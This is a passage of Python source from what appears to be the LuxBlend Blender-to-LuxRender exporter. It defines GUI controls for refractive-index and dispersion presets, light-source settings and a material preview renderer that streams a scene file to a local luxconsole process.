	if use_tex.get() == "true":
		if gui:
			gui.newline("", -2)
		(out, link) = luxTexture(name, key, "float", default, min, max, caption, hint, mat, gui, level+1)
		scale_name = tex_id+".scale"
		out += "Texture \"%s\" \"float\" \"scale\" \"texture tex1\" [\"%s\"] \"float tex2\" [%s]\n" % (scale_name, tex_id, value.get())
		link = " \"texture %s\" [\"%s\"]" % (name, scale_name)
	return (out, link)
def luxIORFloatTexture(name, key, default, min, max, caption, hint, mat, gui, level=0):
	"""Draw an index-of-refraction float property with a preset tree menu
	and an optional texture override.

	When the "Preset" toggle is on, the value is chosen from a popup tree
	of named IOR presets (iortree/iordict below); otherwise it is edited
	as a plain slider. Returns (texture-declaration string,
	parameter-link string).
	"""
	# Fix: removed two dead parallel preset lists (iornames/iorvals) that
	# were never referenced; the preset data actually used is iortree/iordict.
	global icon_float
	if gui: gui.newline(caption, 4, level, icon_float, scalelist([0.5,0.5,0.6],2.0/(level+2)))
	str = ""
	keyname = "%s:%s"%(key, name)
	texname = "%s:%s"%(mat.getName(), keyname)
	value = luxProp(mat, keyname, default)
	iorusepreset = luxProp(mat, keyname+".iorusepreset", "true")
	luxBool("iorusepreset", iorusepreset, "Preset", "Select from a list of predefined presets", gui, 0.4)
	if(iorusepreset.get() == "true"):
		iorpreset = luxProp(mat, keyname+".iorpreset", "24 - Fused silica glass")
		if gui:
			def setIor(i, value, preset, tree, dict): # callback function to set ior value after selection
				if i >= 0:
					value.set(dict[i])
					preset.set(getTreeNameById(tree, i))
			# tree of (label, id) preset entries shown in the popup menu
			iortree = [ ("Liquids", [("Acetone", 1), ("Alcohol, Ethyl (grain)", 2), ("Alcohol, Methyl (wood)", 3), ("Beer", 4), ("Benzene", 5), ("Carbon tetrachloride", 6), ("Carbon disulfide", 7), ("Carbonated Beverages", 8), ("Chlorine (liq)", 9), ("Cranberry Juice (25%)", 10), ("Glycerin", 11), ("Honey, 13% water content", 12), ("Honey, 17% water content", 13), ("Honey, 21% water content", 14), ("Ice", 15), ("Milk", 16), ("Oil, Clove", 17), ("Oil, Lemon", 18), ("Oil, Neroli", 19), ("Oil, Orange", 20), ("Oil, Safflower", 21), ("Oil, vegetable (50 C)", 22), ("Oil of Wintergreen", 23), ("Rum, White", 24), ("Shampoo", 25), ("Sugar Solution 30%", 26), ("Sugar Solution 80%", 27), ("Turpentine", 28), ("Vodka", 29), ("Water (0 C)", 30), ("Water (100 C)", 31), ("Water (20 C)", 32), ("Whisky", 33) ] ), ("Gases", [("Vacuum", 101), ("Air @ STP", 102), ("Air", 103), ("Helium", 104), ("Hydrogen", 105), ("Carbon dioxide", 106) ]), ("Transparent\x20", [("Eye, Aqueous humor", 201), ("Eye, Cornea", 202), ("Eye, Lens", 203), ("Eye, Vitreous humor", 204), ("Glass, Arsenic Trisulfide", 205), ("Glass, Crown (common)", 206), ("Glass, Flint, 29% lead", 207), ("Glass, Flint, 55% lead", 208), ("Glass, Flint, 71% lead", 209), ("Glass, Fused Silica", 210), ("Glass, Pyrex", 211), ("Lucite", 212), ("Nylon", 213), ("Obsidian", 214), ("Plastic", 215), ("Plexiglas", 216), ("Salt", 217) ]), ("Gemstones", [("Agate", 301), ("Alexandrite", 302), ("Almandine", 303), ("Amber", 304), ("Amethyst", 305), ("Ammolite", 306), ("Andalusite", 307), ("Apatite", 308), ("Aquamarine", 309), ("Axenite", 310), ("Beryl", 311), ("Beryl, Red", 312), ("Chalcedony", 313), ("Chrome Tourmaline", 314), ("Citrine", 315), ("Clinohumite", 316), ("Coral", 317), ("Crystal", 318), ("Crysoberyl, Catseye", 319), ("Danburite", 320), ("Diamond", 321), ("Emerald", 322), ("Emerald Catseye", 323), ("Flourite", 324), ("Garnet, Grossular", 325), ("Garnet, Andradite", 326), ("Garnet, Demantiod", 327), ("Garnet, Mandarin", 328), ("Garnet, Pyrope", 329), ("Garnet, Rhodolite", 330), ("Garnet, Tsavorite", 331), ("Garnet, Uvarovite", 332), ("Hauyn", 333), ("Iolite", 334), ("Jade, Jadeite", 335), ("Jade, Nephrite", 336), ("Jet", 337), ("Kunzite", 338), ("Labradorite", 339), ("Lapis Lazuli", 340), ("Moonstone", 341), ("Morganite", 342), ("Obsidian", 343), ("Opal, Black", 344), ("Opal, Fire", 345), ("Opal, White", 346), ("Oregon Sunstone", 347), ("Padparadja", 348), ("Pearl", 349), ("Peridot", 350), ("Quartz", 351), ("Ruby", 352), ("Sapphire", 353), ("Sapphire, Star", 354), ("Spessarite", 355), ("Spinel", 356), ("Spinel, Blue", 357), ("Spinel, Red", 358), ("Star Ruby", 359), ("Tanzanite", 360), ("Topaz", 361), ("Topaz, Imperial", 362), ("Tourmaline", 363), ("Tourmaline, Blue", 364), ("Tourmaline, Catseye", 365), ("Tourmaline, Green", 366), ("Tourmaline, Paraiba", 367), ("Tourmaline, Red", 368), ("Zircon", 369), ("Zirconia, Cubic", 370) ] ), ("Other ", [("Pyrex (Borosilicate glass)", 401), ("Ruby", 402), ("Water ice", 403), ("Cryolite", 404), ("Acetone", 405), ("Ethanol", 406), ("Teflon", 407), ("Glycerol", 408), ("Acrylic glass", 409), ("Rock salt", 410), ("Crown glass (pure)", 411), ("Salt (NaCl)", 412), ("Polycarbonate", 413), ("PMMA", 414), ("PETg", 415), ("PET", 416), ("Flint glass (pure)", 417), ("Crown glass (impure)", 418), ("Fused Quartz", 419), ("Bromine", 420), ("Flint glass (impure)", 421), ("Cubic zirconia", 422), ("Moissanite", 423), ("Cinnabar (Mercury sulfide)", 424), ("Gallium(III) prosphide", 425), ("Gallium(III) arsenide", 426), ("Silicon", 427) ] ) ]
			# preset id -> IOR value lookup used by the setIor callback
			iordict = {1:1.36, 2:1.36, 3:1.329, 4:1.345, 5:1.501, 6:1.000132, 7:1.00045, 8:1.34, 9:1.385, 10:1.351, 11:1.473, 12:1.504, 13:1.494, 14:1.484, 15:1.309, 16:1.35, 17:1.535, 18:1.481, 19:1.482, 20:1.473, 21:1.466, 22:1.47, 23:1.536, 24:1.361, 25:1.362, 26:1.38, 27:1.49, 28:1.472, 29:1.363, 30:1.33346, 31:1.31766, 32:1.33283, 33:1.356, 101:1.0, 102:1.0002926, 103:1.000293, 104:1.000036, 105:1.000132, 106:1.00045, 201:1.33, 202:1.38, 203:1.41, 204:1.34, 205:2.04, 206:1.52, 207:1.569, 208:1.669, 209:1.805, 210:1.459, 211:1.474, 212:1.495, 213:1.53, 214:1.50, 215:1.460, 216:1.488, 217:1.516, 301:1.544, 302:1.746, 303:1.75, 304:1.539, 305:1.532, 306:1.52, 307:1.629, 308:1.632, 309:1.567, 310:1.674, 311:1.57, 312:1.570, 313:1.544, 314:1.61, 315:1.532, 316:1.625, 317:1.486, 318:2.000, 319:1.746, 320:1.627, 321:2.417, 322:1.560, 323:1.560, 324:1.434, 325:1.72, 326:1.88, 327:1.880, 328:1.790, 329:1.73, 330:1.740, 331:1.739, 332:1.74, 333:1.490, 334:1.522, 335:1.64, 336:1.600, 337:1.660, 338:1.660, 339:1.560, 340:1.50, 341:1.518, 342:1.585, 343:1.50, 344:1.440, 345:1.430, 346:1.440, 347:1.560, 348:1.760, 349:1.53, 350:1.635, 351:1.544, 352:1.757, 353:1.757, 354:1.760, 355:1.79, 356:1.712, 357:1.712, 358:1.708, 359:1.76, 360:1.690, 361:1.607, 362:1.605, 363:1.603, 364:1.61, 365:1.61, 366:1.61, 367:1.61, 368:1.61, 369:1.777, 370:2.173, 401:1.47, 402:1.76, 403:1.31, 404:1.388, 405:1.36, 406:1.36, 407:1.35, 408:1.4729, 409:1.49, 410:1.516, 411:1.5, 412:1.544, 413:1.584, 414:1.4893, 415:1.57, 416:1.575, 417:1.6, 418:1.485, 419:1.46, 420:1.661, 421:1.523, 422:2.15, 423:2.419, 424:2.65, 425:3.02, 426:3.5, 427:3.927}
			r = gui.getRect(1.6, 1)
			Draw.Button(iorpreset.get(), evtLuxGui, r[0], r[1], r[2], r[3], "select IOR preset", lambda e,v: setIor(Draw.PupTreeMenu(iortree), value, iorpreset, iortree, iordict))
		link = luxFloat(name, value, min, max, "IOR", hint, None, 1.6)
	else:
		link = luxFloat(name, value, min, max, "IOR", hint, gui, 1.6, 1)
	tex = luxProp(mat, keyname+".textured", False)
	if gui: Draw.Toggle("T", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, tex.get()=="true", "use texture", lambda e,v:tex.set(["false","true"][bool(v)]))
	if tex.get()=="true":
		if gui: gui.newline("", -2)
		(str, link) = luxTexture(name, key, "float", default, min, max, caption, hint, mat, gui, level+1)
		# wrap in a scale texture unless the multiplier is exactly 1.0
		if value.get() != 1.0:
			str += "Texture \"%s\" \"float\" \"scale\" \"texture tex1\" [\"%s\"] \"float tex2\" [%s]\n"%(texname+".scale", texname, value.get())
			link = " \"texture %s\" [\"%s\"]"%(name, texname+".scale")
	return (str, link)
def luxCauchyBFloatTexture(name, key, default, min, max, caption, hint, mat, gui, level=0):
	"""Draw a Cauchy-B dispersion coefficient with glass presets and an
	optional texture override.

	Returns (texture-declaration string, parameter-link string).
	"""
	global icon_float
	# (preset label, Cauchy B coefficient) pairs for common glasses
	presets = [
		("01 - Fused silica glass", 0.00354),
		("02 - Borosilicate glass BK7", 0.00420),
		("03 - Hard crown glass K5", 0.00459),
		("04 - Barium crown glass BaK4", 0.00531),
		("05 - Barium flint glass BaF10", 0.00743),
		("06 - Dense flint glass SF10", 0.01342)]
	preset_names = [p[0] for p in presets]
	if gui:
		gui.newline(caption, 4, level, icon_float, scalelist([0.5,0.5,0.6], 2.0/(level+2)))
	prop_key = "%s:%s" % (key, name)
	tex_id = "%s:%s" % (mat.getName(), prop_key)
	value = luxProp(mat, prop_key, default)
	usepreset = luxProp(mat, prop_key+".cauchybusepreset", "true")
	luxBool("cauchybusepreset", usepreset, "Preset", "Select from a list of predefined presets", gui, 0.4)
	if usepreset.get() == "true":
		chosen = luxProp(mat, prop_key+".cauchybpreset", "01 - Fused silica glass")
		luxOption("cauchybpreset", chosen, preset_names, " PRESET", "select CauchyB preset", gui, 1.6)
		value.set(presets[preset_names.index(chosen.get())][1])
		link = luxFloat(name, value, min, max, "cauchyb", hint, None, 1.6)
	else:
		link = luxFloat(name, value, min, max, "cauchyb", hint, gui, 1.6, 1)
	use_tex = luxProp(mat, prop_key+".textured", False)
	if gui:
		Draw.Toggle("T", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, use_tex.get()=="true", "use texture", lambda e,v: use_tex.set(["false","true"][bool(v)]))
	out = ""
	if use_tex.get() == "true":
		if gui:
			gui.newline("", -2)
		(out, link) = luxTexture(name, key, "float", default, min, max, caption, hint, mat, gui, level+1)
		# Multiply by the plain value unless that would be a no-op.
		if value.get() != 1.0:
			out += "Texture \"%s\" \"float\" \"scale\" \"texture tex1\" [\"%s\"] \"float tex2\" [%s]\n" % (tex_id+".scale", tex_id, value.get())
			link = " \"texture %s\" [\"%s\"]" % (name, tex_id+".scale")
	return (out, link)
def luxLight(name, kn, mat, gui, level):
	"""Draw the emission (AreaLight) settings for a material.

	Returns (texture-declaration string, parameter-link string) covering
	the emission spectrum, power, gain and optional photometric map.
	"""
	if gui:
		if name != "": gui.newline(name+":", 10, level)
		else: gui.newline("color:", 0, level+1)
	(str,link) = luxLightSpectrumTexture("L", kn+"light", "1.0 1.0 1.0", 1.0, "Spectrum", "", mat, gui, level+1)
	if gui: gui.newline("")
	link += luxFloat("power", luxProp(mat, kn+"light.power", 100.0), 0.0, 10000.0, "Power(W)", "AreaLight Power in Watts", gui)
#	link += luxFloat("efficacy", luxProp(mat, kn+"light.efficacy", 17.0), 0.0, 100.0, "Efficacy(lm/W)", "Efficacy Luminous flux/watt", gui)
	if gui: gui.newline("")
	link += luxFloat("scale", luxProp(mat, kn+"light.scale", 1.0), 0.0, 100.0, "scale", "Gain/scale multiplier", gui)
#	lightgroup = luxProp(mat, kn+"light.lightgroup", "default")
#	luxString("lightgroup", lightgroup, "group", "assign light to a named light-group", gui, 1.0)
	if gui: gui.newline("Photometric")
	pm = luxProp(mat, kn+"light.usepm", "false")
	luxCollapse("photometric", pm, "Photometric Diagram", "Enable Photometric Diagram options", gui, 2.0)
	if(pm.get()=="true"):
		# only the "imagemap" diagram type is currently offered
		pmtype = luxProp(mat, kn+"light.pmtype", "imagemap")
		pmtypes = ["imagemap"]
		luxOption("type", pmtype, pmtypes, "type", "Choose Photometric data type to use", gui, 0.6)
		if(pmtype.get() == "imagemap"):
			map = luxProp(mat, kn+"light.pmmapname", "")
			link += luxFile("mapname", map, "map-file", "filename of the photometric map", gui, 1.4)
#		if(pmtype.get() == "IESna"):
#			map = luxProp(mat, kn+"light.pmiesname", "")
#			link += luxFile("iesname", map, "ies-file", "filename of the IES photometric data file", gui, 1.4)
	# NOTE(review): these are assigned as locals and never read again here;
	# they look intended for module-level flags of the same name -- confirm
	# whether a "global" declaration is missing.
	has_bump_options = 0
	has_object_options = 1
	return (str, link)
def luxLamp(name, kn, mat, gui, level):
	"""Draw point/lamp light settings: spectrum, gain multiplier and an
	optional photometric-diagram image map.

	Returns (texture-declaration string, parameter-link string).
	"""
	if gui:
		if name == "":
			gui.newline("color:", 0, level+1)
		else:
			gui.newline(name+":", 10, level)
	(decl, link) = luxLightSpectrumTexture("L", kn+"light", "1.0 1.0 1.0", 1.0, "Spectrum", "", mat, gui, level+1)
	if gui:
		gui.newline("")
	link += luxFloat("scale", luxProp(mat, kn+"light.scale", 1.0), 0.0, 100.0, "scale", "Gain/scale multiplier", gui)
	if gui:
		gui.newline("Photometric")
	pm = luxProp(mat, kn+"light.usepm", "false")
	luxBool("photometric", pm, "Photometric Diagram", "Enable Photometric Diagram options", gui, 2.0)
	if pm.get() == "true":
		map_prop = luxProp(mat, kn+"light.pmmapname", "")
		link += luxFile("mapname", map_prop, "map-file", "filename of the photometric map", gui, 1.4)
	return (decl, link)
def luxSpot(name, kn, mat, gui, level):
	"""Draw spot-light settings: spectrum, gain multiplier and optional
	imagemap texture projection.

	Returns (texture-declaration string, parameter-link string).
	"""
	if gui:
		if name == "":
			gui.newline("color:", 0, level+1)
		else:
			gui.newline(name+":", 10, level)
	(decl, link) = luxLightSpectrumTexture("L", kn+"light", "1.0 1.0 1.0", 1.0, "Spectrum", "", mat, gui, level+1)
	if gui:
		gui.newline("")
	link += luxFloat("scale", luxProp(mat, kn+"light.scale", 1.0), 0.0, 100.0, "scale", "Gain/scale multiplier", gui)
	if gui:
		gui.newline("Projection")
	proj = luxProp(mat, kn+"light.usetexproj", "false")
	luxBool("projection", proj, "Texture Projection", "Enable imagemap texture projection", gui, 2.0)
	if proj.get() == "true":
		map_prop = luxProp(mat, kn+"light.pmmapname", "")
		link += luxFile("mapname", map_prop, "map-file", "filename of the photometric map", gui, 2.0)
	return (decl, link)
def Preview_Sphereset(mat, kn, state):
	"""Toggle callback: make the sphere the active preview shape."""
	if state != "true":
		return
	for suffix, default, active in (("prev_sphere", "true", "true"), ("prev_plane", "false", "false"), ("prev_torus", "false", "false")):
		luxProp(mat, kn+suffix, default).set(active)
def Preview_Planeset(mat, kn, state):
	"""Toggle callback: make the flat plane the active preview shape."""
	if state != "true":
		return
	for suffix, default, active in (("prev_sphere", "true", "false"), ("prev_plane", "false", "true"), ("prev_torus", "false", "false")):
		luxProp(mat, kn+suffix, default).set(active)
def Preview_Torusset(mat, kn, state):
	"""Toggle callback: make the torus the active preview shape."""
	if state != "true":
		return
	for suffix, default, active in (("prev_sphere", "true", "false"), ("prev_plane", "false", "false"), ("prev_torus", "false", "true")):
		luxProp(mat, kn+suffix, default).set(active)
def Preview_Update(mat, kn, defLarge, defType, texName, name, level):
	"""Render a preview thumbnail for a material or texture.

	Streams a small self-contained scene description to a luxconsole
	renderer pipe, reads the raw RGB framebuffer back, and stores it in
	the global previewCache keyed by hash("<matname>:<kn>").
	"""
	#print("%s %s %s %s %s %s %s" % (mat, kn, defLarge, defType, texName, name, level))
	global previewing
	previewing = True
	Blender.Window.WaitCursor(True)
	scn = Scene.GetCurrent()
	# force absolute path mode for the preview export; original mode restored below
	pm_prop = luxProp(scn, "pathmode", "absolute")
	pm = pm_prop.get()
	pm_prop.set('absolute')
	# Size of preview thumbnail
	thumbres = 110 # default 110x110
	if(defLarge):
		large = luxProp(mat, kn+"prev_large", "true")
	else:
		large = luxProp(mat, kn+"prev_large", "false")
	if(large.get() == "true"):
		thumbres = 140 # large 140x140
	thumbbuf = thumbres*thumbres*3
#	consolebin = luxProp(scn, "luxconsole", "").get()
	p = get_lux_pipe(scn, buf=thumbbuf, type="luxconsole")
	# Unremark to write debugging output to file
#	p.stdin = open('c:\preview.lxs', 'w')
	# Select preview shape flags; defType picks the default when unset
	if defType == 0:
		prev_sphere = luxProp(mat, kn+"prev_sphere", "true")
		prev_plane = luxProp(mat, kn+"prev_plane", "false")
		prev_torus = luxProp(mat, kn+"prev_torus", "false")
	elif defType == 1:
		prev_sphere = luxProp(mat, kn+"prev_sphere", "false")
		prev_plane = luxProp(mat, kn+"prev_plane", "true")
		prev_torus = luxProp(mat, kn+"prev_torus", "false")
	else:
		prev_sphere = luxProp(mat, kn+"prev_sphere", "false")
		prev_plane = luxProp(mat, kn+"prev_plane", "false")
		prev_torus = luxProp(mat, kn+"prev_torus", "true")
	# Camera: zoomed-in or default framing
	if luxProp(mat, kn+"prev_zoom", "false").get() == "true":
		p.stdin.write('LookAt 0.250000 -1.500000 0.750000 0.250000 -0.500000 0.750000 0.000000 0.000000 1.000000\nCamera "perspective" "float fov" [22.5]\n')
	else:
		p.stdin.write('LookAt 0.0 -3.0 0.5 0.0 -2.0 0.5 0.0 0.0 1.0\nCamera "perspective" "float fov" [22.5]\n')
	# Film and pixel filter
	p.stdin.write('Film "image" "integer xresolution" [%i] "integer yresolution" [%i] "string filename" ["luxblend-preview"] \n'%(thumbres, thumbres))
	p.stdin.write('PixelFilter "sinc"\n')
	# Sampler quality (pixel-sample count)
	scn = Scene.GetCurrent()
	defprevmat = luxProp(scn, "defprevmat", "high")
	quality = luxProp(mat, kn+"prev_quality", defprevmat.get())
	if quality.get()=="low":
		p.stdin.write('Sampler "lowdiscrepancy" "integer pixelsamples" [2]\n')
	elif quality.get()=="medium":
		p.stdin.write('Sampler "lowdiscrepancy" "integer pixelsamples" [4]\n')
	elif quality.get()=="high":
		p.stdin.write('Sampler "lowdiscrepancy" "integer pixelsamples" [8]\n')
	else:
		p.stdin.write('Sampler "lowdiscrepancy" "integer pixelsamples" [32]\n')
	# SurfaceIntegrator: the flat 2D plane preview needs no bounce depth
	if(prev_plane.get()=="false"):
		p.stdin.write('SurfaceIntegrator "path" "integer directsamples" [1] "integer diffusereflectdepth" [1] "integer diffusereflectsamples" [4] "integer diffuserefractdepth" [4] "integer diffuserefractsamples" [1] "integer glossyreflectdepth" [1] "integer glossyreflectsamples" [2] "integer glossyrefractdepth" [4] "integer glossyrefractsamples" [1] "integer specularreflectdepth" [2] "integer specularrefractdepth" [4]\n')
	else:
		p.stdin.write('SurfaceIntegrator "path" "integer directsamples" [1] "integer diffusereflectdepth" [0] "integer diffusereflectsamples" [0] "integer diffuserefractdepth" [0] "integer diffuserefractsamples" [0] "integer glossyreflectdepth" [0] "integer glossyreflectsamples" [0] "integer glossyrefractdepth" [0] "integer glossyrefractsamples" [0] "integer specularreflectdepth" [1] "integer specularrefractdepth" [1]\n')
	# World block: transform matrix for the selected preview shape
	p.stdin.write('WorldBegin\n')
	if(prev_sphere.get()=="true"):
		p.stdin.write('AttributeBegin\nTransform [0.5 0.0 0.0 0.0 0.0 0.5 0.0 0.0 0.0 0.0 0.5 0.0 0.0 0.0 0.5 1.0]\n')
	elif (prev_plane.get()=="true"):
		p.stdin.write('AttributeBegin\nTransform [0.649999976158 0.0 0.0 0.0 0.0 4.90736340453e-008 0.649999976158 0.0 0.0 -0.649999976158 4.90736340453e-008 0.0 0.0 0.0 0.5 1.0]\n')
	else:
		p.stdin.write('AttributeBegin\nTransform [0.35 -0.35 0.0 0.0 0.25 0.25 0.35 0.0 -0.25 -0.25 0.35 0.0 0.0 0.0 0.5 1.0]\n')
	obwidth = luxProp(mat, kn+"prev_obwidth", 1.0)
	obw = obwidth.get()
	p.stdin.write('TransformBegin\n')
	p.stdin.write('Scale %f %f %f\n'%(obw,obw,obw))
	if texName:
		# Texture preview: bind the texture into a matte material's Kd slot
		print("texture "+texName+" "+name)
		(str, link) = luxTexture(texName, name, "color", "1.0 1.0 1.0", None, None, "", "", mat, None, 0, level)
		link = link.replace(" "+texName+"\"", " Kd\"") # swap texture name to "Kd"
		p.stdin.write(str+"\n")
		p.stdin.write("Material \"matte\" "+link+"\n")
	else:
		# Material preview: export the material itself
		p.stdin.write(luxMaterial(mat))
		link = luxProp(mat,"link","").get()
		if kn!="": link = link.rstrip("\"")+":"+kn.strip(".:")+"\""
		p.stdin.write(link+'\n')
	p.stdin.write('TransformEnd\n')
	# Preview shape geometry
	if(prev_sphere.get()=="true"):
		p.stdin.write('Shape "sphere" "float radius" [1.0]\n')
	elif (prev_plane.get()=="true"):
		p.stdin.write('	Shape "trianglemesh" "integer indices" [ 0 1 2 0 2 3 ] "point P" [ 1.0 1.0 0.0 -1.0 1.0 0.0 -1.0 -1.0 -0.0 1.0 -1.0 -0.0 ] "float uv" [ 1.0 1.0 0.0 1.0 0.0 0.0 1.0 0.0 ]\n')
	elif (prev_torus.get()=="true"):
		p.stdin.write('Shape "torus" "float radius" [1.0]\n')
	p.stdin.write('AttributeEnd\n')
	# Checkerboard floor (skipped for the flat plane preview)
	if(prev_plane.get()=="false"):
		p.stdin.write('AttributeBegin\nTransform [5.0 0.0 0.0 0.0 0.0 5.0 0.0 0.0 0.0 0.0 5.0 0.0 0.0 0.0 0.0 1.0]\n')
		p.stdin.write('Texture "checks" "color" "checkerboard"')
		p.stdin.write('"integer dimension" [2] "string aamode" ["supersample"] "color tex1" [0.9 0.9 0.9] "color tex2" [0.0 0.0 0.0]')
		p.stdin.write('"string mapping" ["uv"] "float uscale" [36.8] "float vscale" [36.0]\n')
		p.stdin.write('Material "matte" "texture Kd" ["checks"]\n')
		p.stdin.write('Shape "loopsubdiv" "integer nlevels" [3] ')
		p.stdin.write('"integer indices" [ 0 1 2 0 2 3 1 0 4 1 4 5 5 4 6 5 6 7 ]')
		p.stdin.write('"point P" [ 1.000000 1.000000 0.000000 -1.000000 1.000000 0.000000 -1.000000 -1.000000 0.000000 1.000000 -1.000000 0.000000 1.000000 3.000000 0.000000 -1.000000 3.000000 0.000000 1.000000 3.000000 2.000000 -1.000000 3.000000 2.000000')
		p.stdin.write('] "normal N" [ 0.000000 0.000000 1.000000 0.000000 0.000000 1.000000 0.000000 0.000000 1.000000 0.000000 0.000000 1.000000 0.000000 -0.707083 0.707083 0.000000 -0.707083 0.707083 0.000000 -1.000000 0.000000 0.000000 -1.000000 0.000000')
		p.stdin.write('] "float uv" [ 0.333334 0.000000 0.333334 0.333334 0.000000 0.333334 0.000000 0.000000 0.666667 0.000000 0.666667 0.333333 1.000000 0.000000 1.000000 0.333333 ]\n')
		p.stdin.write('AttributeEnd\n')
	# Lightsource placement
	if(prev_plane.get()=="false"):
		p.stdin.write('AttributeBegin\nTransform [1.0 0.0 0.0 0.0 0.0 1.0 0.0 0.0 0.0 0.0 1.0 0.0 1.0 -1.0 4.0 1.0]\n')
	else:
		p.stdin.write('AttributeBegin\nTransform [1.0 0.0 0.0 0.0 0.0 1.0 0.0 0.0 0.0 0.0 1.0 0.0 1.0 -4.0 1.0 1.0]\n')
	area = luxProp(mat, kn+"prev_arealight", "false")
	if(area.get() == "false"):
		p.stdin.write('LightSource "point" "blackbody L" [6500] "float gain" [0.002]')
	else:
		p.stdin.write('ReverseOrientation\n')
		p.stdin.write('AreaLightSource "area" "color L" [1.0 1.0 1.0]\n')
	# NOTE(review): this gain parameter attaches to whichever light directive
	# came last; for the point light it adds a second "float gain" on the same
	# directive -- confirm this is intended.
	if(prev_plane.get()=="false"):
		p.stdin.write(' "float gain" [0.3]\n')
	p.stdin.write('Shape "disk" "float radius" [1.0]\nAttributeEnd\n')
	p.stdin.write('WorldEnd\n')
	previewing = False
	# communicate() sends EOF and collects the rendered framebuffer bytes
	data = p.communicate()[0]
	p.stdin.close()
	# restore path mode
	pm_prop.set(pm)
	datalen = len(data)
	if(datalen < thumbbuf):
		print("error on preview: got %i bytes, expected %i" % (datalen, thumbbuf))
		return
	global previewCache
	image = luxImage()
	image.decodeLuxConsole(thumbres, thumbres, data)
	previewCache[(mat.name+":"+kn).__hash__()] = image
	Draw.Redraw()
	Blender.Window.WaitCursor(False)
def luxPreview(mat, name, defType=0, defEnabled=False, defLarge=False, texName=None, gui=None, level=0, color=None):
	"""Draw the collapsible preview panel for a material or texture.

	Shows the cached thumbnail (if any) plus shape/zoom/size/quality
	controls and an "Update Preview" button that triggers Preview_Update().
	Draws nothing when no gui object is supplied.
	"""
	if gui:
		# property-key prefix: "<name>[:<texName>]."
		kn = name
		if texName: kn += ":"+texName
		if kn != "": kn += "."
		if(defEnabled == True):
			showpreview = luxProp(mat, kn+"prev_show", "true")
		else:
			showpreview = luxProp(mat, kn+"prev_show", "false")
		Draw.Toggle("P", evtLuxGui, gui.xmax, gui.y-gui.h, gui.h, gui.h, showpreview.get()=="true", "Preview", lambda e,v: showpreview.set(["false","true"][bool(v)]))
		if showpreview.get()=="true":
			if(defLarge):
				large = luxProp(mat, kn+"prev_large", "true")
			else:
				large = luxProp(mat, kn+"prev_large", "false")
			# layout: row height (rr) and vertical offset grow for large previews
			voffset = -8
			rr = 5.65
			if(large.get() == "true"):
				rr = 7
				voffset = 22
			gui.newline()
			r = gui.getRect(1.1, rr)
			if(color != None):
				# tinted background rectangle behind the preview area
				BGL.glColor3f(color[0],color[1],color[2]); BGL.glRectf(r[0]-110, r[1], 418, r[1]+128+voffset); BGL.glColor3f(0.9, 0.9, 0.9)
			# draw the cached thumbnail; silently skip when none rendered yet
			try: previewCache[(mat.name+":"+kn).__hash__()].draw(r[0]-82, r[1]+4)
			except: pass
			prev_sphere = luxProp(mat, kn+"prev_sphere", "true")
			prev_plane = luxProp(mat, kn+"prev_plane", "false")
			prev_torus = luxProp(mat, kn+"prev_torus", "false")
			if defType == 1:
				prev_sphere = luxProp(mat, kn+"prev_sphere", "false")
				prev_plane = luxProp(mat, kn+"prev_plane", "true")
				prev_torus = luxProp(mat, kn+"prev_torus", "false")
			elif defType == 2:
				prev_sphere = luxProp(mat, kn+"prev_sphere", "false")
				prev_plane = luxProp(mat, kn+"prev_plane", "false")
				prev_torus = luxProp(mat, kn+"prev_torus", "true")
			# preview mode toggle buttons
			Draw.Toggle("S", evtLuxGui, r[0]-108, r[1]+100+voffset, 22, 22, prev_sphere.get()=="true", "Draw Sphere", lambda e,v: Preview_Sphereset(mat, kn, ["false","true"][bool(v)]))
			Draw.Toggle("P", evtLuxGui, r[0]-108, r[1]+74+voffset, 22, 22, prev_plane.get()=="true", "Draw 2D Plane", lambda e,v: Preview_Planeset(mat, kn, ["false","true"][bool(v)]))
			Draw.Toggle("T", evtLuxGui, r[0]-108, r[1]+48+voffset, 22, 22, prev_torus.get()=="true", "Draw Torus", lambda e,v: Preview_Torusset(mat, kn, ["false","true"][bool(v)]))
			# Zoom toggle
			zoom = luxProp(mat, kn+"prev_zoom", "false")
			Draw.Toggle("Zoom", evtLuxGui, r[0]+66, r[1]+100+voffset, 50, 18, zoom.get()=="true", "Zoom", lambda e,v: zoom.set(["false","true"][bool(v)]))
			# Area-light toggle for the preview scene
			area = luxProp(mat, kn+"prev_arealight", "false")
			Draw.Toggle("Area", evtLuxGui, r[0]+66, r[1]+5, 50, 18, area.get()=="true", "Area", lambda e,v: area.set(["false","true"][bool(v)]))
			# Object width
			obwidth = luxProp(mat, kn+"prev_obwidth", 1.0)
			Draw.Number("Width:", evtLuxGui, r[0]+66, r[1]+78+voffset, 129, 18, obwidth.get(), 0.001, 10, "The width of the preview object in blender/lux 1m units", lambda e,v: obwidth.set(v))
			# large/small size
			Draw.Toggle("large", evtLuxGui, r[0]+200, r[1]+78+voffset, 88, 18, large.get()=="true", "Large", lambda e,v: large.set(["false","true"][bool(v)]))
			# Preview Quality
			qs = ["low","medium","high","very high"]
			scn = Scene.GetCurrent()
			defprevmat = luxProp(scn, "defprevmat", "high")
			quality = luxProp(mat, kn+"prev_quality", defprevmat.get())
			luxOptionRect("quality", quality, qs, " Quality", "select preview quality", gui, r[0]+200, r[1]+100+voffset, 88, 18)
			# Update preview
			Draw.Button("Update Preview", evtLuxGui, r[0]+120, r[1]+5, 167, 18, "Update Material Preview", lambda e,v: Preview_Update(mat, kn, defLarge, defType, texName, name, level))
			# Reset depths after getRect()
			gui.y -= 92+voffset
			gui.y -= gui.h
			gui.hmax = 18 + 4
def luxMaterialBlock(name, luxname, key, mat, gui=None, level=0, str_opt=""):
    """Draw the GUI for one lux material block and build its export text.

    name:    property name of this (sub)material ("" at the root level)
    luxname: lux parameter name this block is referenced by (e.g. "namedmaterial1")
    key:     property-key prefix of the enclosing block ("" at the root)
    mat:     Blender material carrying the lux properties
    gui:     GUI layout object, or None for a GUI-less export run
    level:   nesting depth of this block (0 = top-level material)
    str_opt: extra parameter text appended to boundvolume definitions

    Returns a (str, link) pair: 'str' is scene-file text declaring this
    material (plus any sub-materials), 'link' is the snippet the caller
    embeds to reference it.
    """
    global icon_mat, icon_matmix, icon_map3dparam
    # element-wise concatenation of two (str, link) pairs
    def c(t1, t2):
        return (t1[0]+t2[0], t1[1]+t2[1])
    str = ""
    # build the fully qualified property-key prefix for this block
    if key == "": keyname = kn = name
    else: keyname = kn = "%s:%s"%(key, name)
    if kn != "": kn += "."
    if keyname == "": matname = mat.getName()
